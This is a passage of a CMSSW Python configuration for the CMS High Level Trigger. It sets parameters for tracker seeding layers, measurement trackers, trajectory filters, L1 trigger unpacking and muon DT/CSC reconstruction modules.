'BPix1+BPix2+FPix1_pos',\n 'BPix1+BPix2+FPix1_neg',\n 'BPix3+FPix1_pos+TID1_pos',\n 'BPix3+FPix1_neg+TID1_neg',\n 'FPix1_pos+FPix2_pos+TEC1_pos',\n 'FPix1_neg+FPix2_neg+TEC1_neg',\n 
'FPix2_pos+TID3_pos+TEC1_pos',\n 'FPix2_neg+TID3_neg+TEC1_neg',\n 'FPix2_pos+TEC2_pos+TEC3_pos',\n 'FPix2_neg+TEC2_neg+TEC3_neg' ),\n BPix = cms.PSet( \n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n hitErrorRZ = cms.double( 0.0060 ),\n useErrorsFromParam = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n skipClusters = cms.InputTag( \"hltIter3ClustersRefRemoval\" ),\n hitErrorRPhi = cms.double( 0.0027 )\n ),\n FPix = cms.PSet( \n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n hitErrorRZ = cms.double( 0.0036 ),\n useErrorsFromParam = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n skipClusters = cms.InputTag( \"hltIter3ClustersRefRemoval\" ),\n hitErrorRPhi = cms.double( 0.0051 )\n ),\n TEC = cms.PSet( \n useRingSlector = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n minRing = cms.int32( 1 ),\n maxRing = cms.int32( 2 )\n ),\n TID = cms.PSet( \n useRingSlector = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n minRing = cms.int32( 1 ),\n maxRing = cms.int32( 2 )\n ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltIter3ESPLayerTripletsB = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltIter3ESPLayerTripletsB\" ),\n layerList = cms.vstring( 'BPix2+BPix3+TIB1',\n 'BPix2+BPix3+TIB2',\n 'BPix1+BPix3+TIB1',\n 'BPix1+BPix3+TIB2',\n 'BPix1+TIB1+TIB2',\n 'BPix2+TIB1+TIB2',\n 'BPix3+TIB1+TIB2' ),\n BPix = cms.PSet( \n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n hitErrorRZ = cms.double( 0.0060 ),\n useErrorsFromParam = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n skipClusters = cms.InputTag( \"hltIter3ClustersRefRemoval\" ),\n hitErrorRPhi = cms.double( 0.0027 )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( ),\n TID = cms.PSet( ),\n TIB = cms.PSet( TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ) ),\n TOB = cms.PSet( )\n)\nhltIter3ESPMeasurementTracker = cms.ESProducer( \"MeasurementTrackerESProducer\",\n ComponentName = cms.string( \"hltIter3ESPMeasurementTracker\" ),\n PixelCPE = cms.string( \"hltESPPixelCPEGeneric\" ),\n StripCPE = cms.string( \"StripCPEfromTrackAngle\" ),\n HitMatcher = cms.string( \"StandardMatcher\" ),\n Regional = cms.bool( True ),\n OnDemand = cms.bool( True ),\n UsePixelModuleQualityDB = cms.bool( True ),\n DebugPixelModuleQualityDB = cms.untracked.bool( False ),\n UsePixelROCQualityDB = cms.bool( True ),\n DebugPixelROCQualityDB = cms.untracked.bool( False ),\n UseStripModuleQualityDB = cms.bool( True ),\n DebugStripModuleQualityDB = cms.untracked.bool( False ),\n UseStripAPVFiberQualityDB = cms.bool( True ),\n DebugStripAPVFiberQualityDB = cms.untracked.bool( False ),\n MaskBadAPVFibers = cms.bool( True ),\n UseStripStripQualityDB = cms.bool( True ),\n DebugStripStripQualityDB = cms.untracked.bool( False ),\n SiStripQualityLabel = cms.string( \"\" ),\n switchOffPixelsIfEmpty = cms.bool( True ),\n pixelClusterProducer = cms.string( \"hltSiPixelClusters\" ),\n skipClusters = cms.InputTag( \"hltIter3ClustersRefRemoval\" ),\n stripClusterProducer = cms.string( \"hltIter3SiStripClusters\" ),\n stripLazyGetterProducer = cms.string( \"hltSiStripRawToClustersFacility\" ),\n 
appendToDataLabel = cms.string( \"\" ),\n inactivePixelDetectorLabels = cms.VInputTag( ),\n inactiveStripDetectorLabels = cms.VInputTag( ),\n badStripCuts = cms.PSet( \n TID = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TOB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TEC = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TIB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n )\n )\n)\nhltIter3ESPTrajectoryBuilderIT = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltIter3ESPTrajectoryBuilderIT\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltIter3ESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltIter3ESPTrajectoryFilterIT\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltIter3ESPTrajectoryFilterIT = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltIter3ESPTrajectoryFilterIT\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 3 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 0 ),\n maxNumberOfHits = cms.int32( 100 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 0.6 )\n )\n)\nhltIter4ESPMeasurementTracker = cms.ESProducer( \"MeasurementTrackerESProducer\",\n ComponentName = cms.string( \"hltIter4ESPMeasurementTracker\" ),\n PixelCPE = cms.string( \"hltESPPixelCPEGeneric\" ),\n StripCPE = cms.string( \"StripCPEfromTrackAngle\" ),\n HitMatcher = cms.string( \"StandardMatcher\" ),\n Regional = cms.bool( True ),\n OnDemand = cms.bool( True ),\n UsePixelModuleQualityDB = cms.bool( True ),\n DebugPixelModuleQualityDB = cms.untracked.bool( False ),\n UsePixelROCQualityDB = cms.bool( True ),\n DebugPixelROCQualityDB = cms.untracked.bool( False ),\n UseStripModuleQualityDB = cms.bool( True ),\n DebugStripModuleQualityDB = cms.untracked.bool( False ),\n UseStripAPVFiberQualityDB = cms.bool( True ),\n DebugStripAPVFiberQualityDB = cms.untracked.bool( False ),\n MaskBadAPVFibers = cms.bool( True ),\n UseStripStripQualityDB = cms.bool( True ),\n DebugStripStripQualityDB = cms.untracked.bool( False ),\n SiStripQualityLabel = cms.string( \"\" ),\n switchOffPixelsIfEmpty = cms.bool( True ),\n pixelClusterProducer = cms.string( \"hltSiPixelClusters\" ),\n skipClusters = cms.InputTag( \"hltIter4ClustersRefRemoval\" ),\n stripClusterProducer = cms.string( \"hltIter4SiStripClusters\" ),\n stripLazyGetterProducer = cms.string( \"hltSiStripRawToClustersFacility\" ),\n appendToDataLabel = cms.string( \"\" ),\n inactivePixelDetectorLabels = cms.VInputTag( ),\n inactiveStripDetectorLabels = cms.VInputTag( ),\n badStripCuts = cms.PSet( \n TID = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TOB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 
9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TEC = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TIB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n )\n )\n)\nhltIter4ESPPixelLayerPairs = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltIter4ESPPixelLayerPairs\" ),\n layerList = cms.vstring( 'TIB1+TIB2' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( \n useRingSlector = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n minRing = cms.int32( 1 ),\n maxRing = cms.int32( 2 )\n ),\n TID = cms.PSet( \n useRingSlector = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n minRing = cms.int32( 1 ),\n maxRing = cms.int32( 2 )\n ),\n TIB = cms.PSet( TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ) ),\n TOB = cms.PSet( )\n)\nhltIter4ESPTrajectoryBuilderIT = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltIter4ESPTrajectoryBuilderIT\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltIter4ESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltIter4ESPTrajectoryFilterIT\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" ),\n minNrOfHitsForRebuild = cms.untracked.int32( 4 )\n)\nhltIter4ESPTrajectoryFilterIT = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltIter4ESPTrajectoryFilterIT\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 6 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 0 ),\n maxNumberOfHits = cms.int32( 100 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 0.6 )\n )\n)\nClusterShapeHitFilterESProducer = cms.ESProducer( \"ClusterShapeHitFilterESProducer\",\n ComponentName = cms.string( \"ClusterShapeHitFilter\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPFittingSmootherIT = cms.ESProducer( \"KFFittingSmootherESProducer\",\n ComponentName = cms.string( \"hltESPFittingSmootherIT\" ),\n Fitter = cms.string( \"hltESPTrajectoryFitterRK\" ),\n Smoother = cms.string( \"hltESPTrajectorySmootherRK\" ),\n EstimateCut = cms.double( 10.0 ),\n LogPixelProbabilityCut = cms.double( -16.0 ),\n MinNumberOfHits = cms.int32( 3 ),\n RejectTracks = cms.bool( True ),\n BreakTrajWith2ConsecutiveMissing = cms.bool( True ),\n NoInvalidHitsBeginEnd = cms.bool( 
True ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPTrajectoryBuilderIT = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltESPTrajectoryBuilderIT\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltESPTrajectoryFilterIT\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPTrajectoryFilterIT = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltESPTrajectoryFilterIT\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 3 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( 100 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 0.6 )\n )\n)\nCastorDbProducer = cms.ESProducer( \"CastorDbProducer\",\n file = cms.untracked.string( \"\" ),\n appendToDataLabel = cms.string( \"\" ),\n dump = cms.untracked.vstring( )\n)\nhltESPMeasurementTracker = cms.ESProducer( \"MeasurementTrackerESProducer\",\n ComponentName = cms.string( \"hltESPMeasurementTracker\" ),\n PixelCPE = cms.string( \"hltESPPixelCPEGeneric\" ),\n StripCPE = cms.string( \"StripCPEfromTrackAngle\" ),\n HitMatcher = cms.string( \"StandardMatcher\" ),\n Regional = cms.bool( True ),\n OnDemand = cms.bool( True ),\n UsePixelModuleQualityDB = cms.bool( True ),\n DebugPixelModuleQualityDB = cms.untracked.bool( False ),\n UsePixelROCQualityDB = cms.bool( True ),\n DebugPixelROCQualityDB = cms.untracked.bool( False ),\n UseStripModuleQualityDB = cms.bool( True ),\n DebugStripModuleQualityDB = cms.untracked.bool( False ),\n UseStripAPVFiberQualityDB = cms.bool( True ),\n DebugStripAPVFiberQualityDB = cms.untracked.bool( False ),\n MaskBadAPVFibers = cms.bool( True ),\n UseStripStripQualityDB = cms.bool( True ),\n DebugStripStripQualityDB = cms.untracked.bool( False ),\n SiStripQualityLabel = cms.string( \"\" ),\n switchOffPixelsIfEmpty = cms.bool( True ),\n pixelClusterProducer = cms.string( \"hltSiPixelClusters\" ),\n skipClusters = cms.InputTag( \"\" ),\n stripClusterProducer = cms.string( \"hltSiStripClusters\" ),\n stripLazyGetterProducer = cms.string( \"hltSiStripRawToClustersFacility\" ),\n appendToDataLabel = cms.string( \"\" ),\n inactivePixelDetectorLabels = cms.VInputTag( ),\n inactiveStripDetectorLabels = cms.VInputTag( 'hltSiStripExcludedFEDListProducer' ),\n badStripCuts = cms.PSet( \n TID = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TOB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TEC = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TIB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n )\n )\n)\n\nUpdaterService = cms.Service( \"UpdaterService\",\n)\n\nhltTriggerType = cms.EDFilter( \"HLTTriggerTypeFilter\",\n 
SelectedTriggerType = cms.int32( 1 )\n)\nhltGtDigis = cms.EDProducer( \"L1GlobalTriggerRawToDigi\",\n DaqGtInputTag = cms.InputTag( \"rawDataCollector\" ),\n DaqGtFedId = cms.untracked.int32( 813 ),\n ActiveBoardsMask = cms.uint32( 0xffff ),\n UnpackBxInEvent = cms.int32( 5 ),\n Verbosity = cms.untracked.int32( 0 )\n)\nhltGctDigis = cms.EDProducer( \"GctRawToDigi\",\n inputLabel = cms.InputTag( \"rawDataCollector\" ),\n gctFedId = cms.untracked.int32( 745 ),\n hltMode = cms.bool( True ),\n numberOfGctSamplesToUnpack = cms.uint32( 1 ),\n numberOfRctSamplesToUnpack = cms.uint32( 1 ),\n unpackSharedRegions = cms.bool( False ),\n unpackerVersion = cms.uint32( 0 ),\n checkHeaders = cms.untracked.bool( False ),\n verbose = cms.untracked.bool( False )\n)\nhltL1GtObjectMap = cms.EDProducer( \"L1GlobalTrigger\",\n GmtInputTag = cms.InputTag( \"hltGtDigis\" ),\n GctInputTag = cms.InputTag( \"hltGctDigis\" ),\n CastorInputTag = cms.InputTag( \"castorL1Digis\" ),\n ProduceL1GtDaqRecord = cms.bool( False ),\n ProduceL1GtEvmRecord = cms.bool( False ),\n ProduceL1GtObjectMapRecord = cms.bool( True ),\n WritePsbL1GtDaqRecord = cms.bool( False ),\n ReadTechnicalTriggerRecords = cms.bool( True ),\n EmulateBxInEvent = cms.int32( 1 ),\n AlternativeNrBxBoardDaq = cms.uint32( 0 ),\n AlternativeNrBxBoardEvm = cms.uint32( 0 ),\n BstLengthBytes = cms.int32( -1 ),\n Verbosity = cms.untracked.int32( 0 ),\n TechnicalTriggersInputTags = cms.VInputTag( 'simBscDigis' ),\n RecordLength = cms.vint32( 3, 0 )\n)\nhltL1extraParticles = cms.EDProducer( \"L1ExtraParticlesProd\",\n produceMuonParticles = cms.bool( True ),\n muonSource = cms.InputTag( \"hltGtDigis\" ),\n produceCaloParticles = cms.bool( True ),\n isolatedEmSource = cms.InputTag( 'hltGctDigis','isoEm' ),\n nonIsolatedEmSource = cms.InputTag( 'hltGctDigis','nonIsoEm' ),\n centralJetSource = cms.InputTag( 'hltGctDigis','cenJets' ),\n forwardJetSource = cms.InputTag( 'hltGctDigis','forJets' ),\n tauJetSource = cms.InputTag( 'hltGctDigis','tauJets' ),\n etTotalSource = cms.InputTag( \"hltGctDigis\" ),\n etHadSource = cms.InputTag( \"hltGctDigis\" ),\n etMissSource = cms.InputTag( \"hltGctDigis\" ),\n htMissSource = cms.InputTag( \"hltGctDigis\" ),\n hfRingEtSumsSource = cms.InputTag( \"hltGctDigis\" ),\n hfRingBitCountsSource = cms.InputTag( \"hltGctDigis\" ),\n centralBxOnly = cms.bool( True ),\n ignoreHtMiss = cms.bool( False )\n)\nhltScalersRawToDigi = cms.EDProducer( \"ScalersRawToDigi\",\n scalersInputTag = cms.InputTag( \"rawDataCollector\" )\n)\nhltOnlineBeamSpot = cms.EDProducer( \"BeamSpotOnlineProducer\",\n label = cms.InputTag( \"hltScalersRawToDigi\" ),\n changeToCMSCoordinates = cms.bool( False ),\n maxRadius = cms.double( 2.0 ),\n maxZ = cms.double( 40.0 ),\n setSigmaZ = cms.double( 0.0 ),\n gtEvmLabel = cms.InputTag( \"\" )\n)\nhltOfflineBeamSpot = cms.EDProducer( \"BeamSpotProducer\" )\nhltL1sL1DoubleMu0HighQ = cms.EDFilter( \"HLTLevel1GTSeed\",\n L1UseL1TriggerObjectMaps = cms.bool( True ),\n L1NrBxInEvent = cms.int32( 3 ),\n L1TechTriggerSeeding = cms.bool( False ),\n L1UseAliasesForSeeding = cms.bool( True ),\n L1SeedsLogicalExpression = cms.string( \"L1_DoubleMu0_HighQ\" ),\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n L1GtObjectMapTag = cms.InputTag( \"hltL1GtObjectMap\" ),\n L1CollectionsTag = cms.InputTag( \"hltL1extraParticles\" ),\n L1MuonCollectionTag = cms.InputTag( \"hltL1extraParticles\" ),\n saveTags = cms.bool( True )\n)\nhltPreDoubleMu4JpsiDisplaced = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( 
\"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDimuonL1Filtered0 = cms.EDFilter( \"HLTMuonL1Filter\",\n CandTag = cms.InputTag( \"hltL1extraParticles\" ),\n PreviousCandTag = cms.InputTag( \"hltL1sL1DoubleMu0HighQ\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinN = cms.int32( 2 ),\n ExcludeSingleSegmentCSC = cms.bool( False ),\n CSCTFtag = cms.InputTag( \"unused\" ),\n saveTags = cms.bool( True ),\n SelectQualities = cms.vint32( )\n)\nhltMuonDTDigis = cms.EDProducer( \"DTUnpackingModule\",\n dataType = cms.string( \"DDU\" ),\n fedbyType = cms.bool( False ),\n inputLabel = cms.InputTag( \"rawDataCollector\" ),\n useStandardFEDid = cms.bool( True ),\n minFEDid = cms.untracked.int32( 770 ),\n maxFEDid = cms.untracked.int32( 779 ),\n dqmOnly = cms.bool( False ),\n rosParameters = cms.PSet( ),\n readOutParameters = cms.PSet( \n debug = cms.untracked.bool( False ),\n rosParameters = cms.PSet( \n writeSC = cms.untracked.bool( True ),\n readingDDU = cms.untracked.bool( True ),\n performDataIntegrityMonitor = cms.untracked.bool( False ),\n readDDUIDfromDDU = cms.untracked.bool( True ),\n debug = cms.untracked.bool( False ),\n localDAQ = cms.untracked.bool( False )\n ),\n localDAQ = cms.untracked.bool( False ),\n performDataIntegrityMonitor = cms.untracked.bool( False )\n )\n)\nhltDt1DRecHits = cms.EDProducer( \"DTRecHitProducer\",\n debug = cms.untracked.bool( False ),\n dtDigiLabel = cms.InputTag( \"hltMuonDTDigis\" ),\n recAlgo = cms.string( \"DTLinearDriftFromDBAlgo\" ),\n recAlgoConfig = cms.PSet( \n tTrigMode = cms.string( \"DTTTrigSyncFromDB\" ),\n minTime = cms.double( -3.0 ),\n stepTwoFromDigi = cms.bool( False ),\n doVdriftCorr = cms.bool( False ),\n debug = cms.untracked.bool( False ),\n maxTime = cms.double( 420.0 ),\n tTrigModeConfig = cms.PSet( \n vPropWire = cms.double( 24.4 ),\n doTOFCorrection = cms.bool( True ),\n tofCorrType = cms.int32( 0 ),\n wirePropCorrType = cms.int32( 0 ),\n tTrigLabel = cms.string( \"\" ),\n doWirePropCorrection = cms.bool( True ),\n doT0Correction = cms.bool( True ),\n debug = cms.untracked.bool( False )\n )\n )\n)\nhltDt4DSegments = cms.EDProducer( \"DTRecSegment4DProducer\",\n debug = cms.untracked.bool( False ),\n recHits1DLabel = cms.InputTag( \"hltDt1DRecHits\" ),\n recHits2DLabel = cms.InputTag( \"dt2DSegments\" ),\n Reco4DAlgoName = cms.string( \"DTCombinatorialPatternReco4D\" ),\n Reco4DAlgoConfig = cms.PSet( \n segmCleanerMode = cms.int32( 2 ),\n Reco2DAlgoName = cms.string( \"DTCombinatorialPatternReco\" ),\n recAlgoConfig = cms.PSet( \n tTrigMode = cms.string( \"DTTTrigSyncFromDB\" ),\n minTime = cms.double( -3.0 ),\n stepTwoFromDigi = cms.bool( False ),\n doVdriftCorr = cms.bool( False ),\n debug = cms.untracked.bool( False ),\n maxTime = cms.double( 420.0 ),\n tTrigModeConfig = cms.PSet( \n vPropWire = cms.double( 24.4 ),\n doTOFCorrection = cms.bool( True ),\n tofCorrType = cms.int32( 0 ),\n wirePropCorrType = cms.int32( 0 ),\n tTrigLabel = cms.string( \"\" ),\n doWirePropCorrection = cms.bool( True ),\n doT0Correction = cms.bool( True ),\n debug = cms.untracked.bool( False )\n )\n ),\n nSharedHitsMax = cms.int32( 2 ),\n hit_afterT0_resolution = cms.double( 0.03 ),\n Reco2DAlgoConfig = cms.PSet( \n segmCleanerMode = cms.int32( 2 ),\n recAlgoConfig = cms.PSet( \n tTrigMode = cms.string( \"DTTTrigSyncFromDB\" ),\n minTime = cms.double( -3.0 ),\n stepTwoFromDigi = cms.bool( False ),\n doVdriftCorr = cms.bool( False ),\n debug = cms.untracked.bool( False ),\n maxTime = cms.double( 420.0 ),\n tTrigModeConfig = cms.PSet( 
\n vPropWire = cms.double( 24.4 ),\n doTOFCorrection = cms.bool( True ),\n tofCorrType = cms.int32( 0 ),\n wirePropCorrType = cms.int32( 0 ),\n tTrigLabel = cms.string( \"\" ),\n doWirePropCorrection = cms.bool( True ),\n doT0Correction = cms.bool( True ),\n debug = cms.untracked.bool( False )\n )\n ),\n nSharedHitsMax = cms.int32( 2 ),\n AlphaMaxPhi = cms.double( 1.0 ),\n hit_afterT0_resolution = cms.double( 0.03 ),\n MaxAllowedHits = cms.uint32( 50 ),\n performT0_vdriftSegCorrection = cms.bool( False ),\n AlphaMaxTheta = cms.double( 0.9 ),\n debug = cms.untracked.bool( False ),\n recAlgo = cms.string( \"DTLinearDriftFromDBAlgo\" ),\n nUnSharedHitsMin = cms.int32( 2 ),\n performT0SegCorrection = cms.bool( False )\n ),\n performT0_vdriftSegCorrection = cms.bool( False ),\n debug = cms.untracked.bool( False ),\n recAlgo = cms.string( \"DTLinearDriftFromDBAlgo\" ),\n nUnSharedHitsMin = cms.int32( 2 ),\n AllDTRecHits = cms.bool( True ),\n performT0SegCorrection = cms.bool( False )\n )\n)\nhltMuonCSCDigis = cms.EDProducer( \"CSCDCCUnpacker\",\n InputObjects = cms.InputTag( \"rawDataCollector\" ),\n UseExaminer = cms.bool( True ),\n ExaminerMask = cms.uint32( 0x1febf3f6 ),\n UseSelectiveUnpacking = cms.bool( True ),\n ErrorMask = cms.uint32( 0x0 ),\n UnpackStatusDigis = cms.bool( False ),\n UseFormatStatus = cms.bool( True ),\n PrintEventNumber = cms.untracked.bool( False ),\n Debug = cms.untracked.bool( False ),\n runDQM = cms.untracked.bool( False ),\n VisualFEDInspect = cms.untracked.bool( False ),\n VisualFEDShort = cms.untracked.bool( False ),\n FormatedEventDump = cms.untracked.bool( False ),\n SuppressZeroLCT = cms.untracked.bool( True )\n)\nhltCsc2DRecHits = cms.EDProducer( \"CSCRecHitDProducer\",\n CSCUseCalibrations = cms.bool( True ),\n CSCUseStaticPedestals = cms.bool( False ),\n CSCUseTimingCorrections = cms.bool( True ),\n stripDigiTag = cms.InputTag( 'hltMuonCSCDigis','MuonCSCStripDigi' ),\n wireDigiTag = cms.InputTag( 'hltMuonCSCDigis','MuonCSCWireDigi' ),\n CSCstripWireDeltaTime = cms.int32( 8 ),\n CSCNoOfTimeBinsForDynamicPedestal = cms.int32( 2 ),\n CSCStripPeakThreshold = cms.double( 10.0 ),\n CSCStripClusterChargeCut = cms.double( 25.0 ),\n CSCWireClusterDeltaT = cms.int32( 1 ),\n CSCStripxtalksOffset = cms.double( 0.03 ),\n NoiseLevel_ME1a = cms.double( 7.0 ),\n XTasymmetry_ME1a = cms.double( 0.0 ),\n ConstSyst_ME1a = cms.double( 0.022 ),\n NoiseLevel_ME1b = cms.double( 8.0 ),\n XTasymmetry_ME1b = cms.double( 0.0 ),\n ConstSyst_ME1b = cms.double( 0.0070 ),\n NoiseLevel_ME12 = cms.double( 9.0 ),\n XTasymmetry_ME12 = cms.double( 0.0 ),\n ConstSyst_ME12 = cms.double( 0.0 ),\n NoiseLevel_ME13 = cms.double( 8.0 ),\n XTasymmetry_ME13 = cms.double( 0.0 ),\n ConstSyst_ME13 = cms.double( 0.0 ),\n NoiseLevel_ME21 = cms.double( 9.0 ),\n XTasymmetry_ME21 = cms.double( 0.0 ),\n ConstSyst_ME21 = cms.double( 0.0 ),\n NoiseLevel_ME22 = cms.double( 9.0 ),\n XTasymmetry_ME22 = cms.double( 0.0 ),\n ConstSyst_ME22 = cms.double( 0.0 ),\n NoiseLevel_ME31 = cms.double( 9.0 ),\n XTasymmetry_ME31 = cms.double( 0.0 ),\n ConstSyst_ME31 = cms.double( 0.0 ),\n NoiseLevel_ME32 = cms.double( 9.0 ),\n XTasymmetry_ME32 = cms.double( 0.0 ),\n ConstSyst_ME32 = cms.double( 0.0 ),\n NoiseLevel_ME41 = cms.double( 9.0 ),\n XTasymmetry_ME41 = cms.double( 0.0 ),\n ConstSyst_ME41 = cms.double( 0.0 ),\n readBadChannels = cms.bool( True ),\n readBadChambers = cms.bool( True ),\n UseAverageTime = cms.bool( False ),\n UseParabolaFit = cms.bool( False ),\n UseFivePoleFit = cms.bool( True )\n)\nhltCscSegments = 
